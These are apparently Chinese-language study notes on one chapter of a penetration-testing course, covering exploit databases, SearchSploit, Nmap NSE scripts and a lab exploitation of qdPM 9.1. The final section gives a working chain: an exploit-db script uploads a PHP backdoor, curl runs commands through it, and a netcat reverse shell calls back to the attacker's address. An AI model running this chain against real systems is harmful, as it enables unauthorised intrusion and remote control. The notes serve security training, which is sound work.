本篇对应教材第12章，主要内容“在线exp库”、“离线exp库”、“漏洞利用”，记录使用工具和命令

## 12.2 在线exp库

网站

```python
https://www.exploit-db.com/
https://packetstormsecurity.com/
https://github.com/
firefox --search "Microsoft Edge site:exploit-db.com"
```

## 12.3 离线exp库

### 12.3.1 MSF

‍

### 12.3.2 SearchSploit

升级库

```python
sudo apt update && sudo apt install exploitdb
```

查看exp库文件

```python
ls -1 /usr/share/exploitdb/
ls -1 /usr/share/exploitdb/exploits
```

搜索制定漏洞exp

```python
searchsploit remote smb microsoft windows
```

拷贝到当前目录

```python
searchsploit -m windows/remote/48537.py
searchsploit -m 42031
```

### 12.3.3 NSE脚本插件

```python
grep Exploits /usr/share/nmap/scripts/*.nse

nmap --script-help=clamav-exec.nse
```

## 12.4 漏洞利用

### 12.4.1 漏洞利用

发现web应用程序

```python
<div class="copyright">
	 <a href="http://qdpm.net" target="_blank">qdPM 9.1</a> <br /> Copyright &copy; 2022 <a href="http://qdpm.net" target="_blank">qdpm.net</a>
</div>
```

exploit-db上搜索“qdPM 9.1”

```python
searchsploit -m 50944
```

```python
python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
nc -lvnp 6666
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
```

更多更新资料（微信公众号：TopRedTeam）

![](./qrcode.jpg)